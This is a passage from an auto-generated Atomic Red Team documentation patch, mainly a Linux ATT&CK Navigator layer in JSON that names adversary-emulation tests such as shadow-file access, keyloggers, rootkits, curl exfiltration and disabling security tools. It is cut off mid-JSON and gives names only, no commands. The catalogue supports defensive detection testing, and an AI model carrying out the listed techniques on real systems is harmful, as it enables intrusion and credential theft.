From 96d11e0592c53d737394c2dbf7cf42b875965b31 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 17 Mar 2023 19:48:14 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 6 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 4 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 6 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- .../Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 161 +++++++++-------- atomics/Indexes/linux-index.yaml | 107 ++++++----- atomics/T1110.001/T1110.001.md | 171 +++++++++--------- 10 files changed, 244 insertions(+), 221 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 0a2938c1d5..4f279842cf 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Linux)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts (Linux)\n- Execute Python via Python executables (Linux)\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"comment":"\n- rm -rf\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO brute force Debian\n- SUDO brute force Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":5,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (Linux)\n- Encrypt files using 7z (Linux)\n- Encrypt files using ccrypt (Linux)\n- Encrypt files using openssl (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n- Shutdown System via `halt` - Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":2,"enabled":true,"comment":"\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (Linux)\n- Compressing data using bz2 in Python (Linux)\n- Compressing data using zipfile in Python (Linux)\n- Compressing data using tarfile in Python (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":9,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using 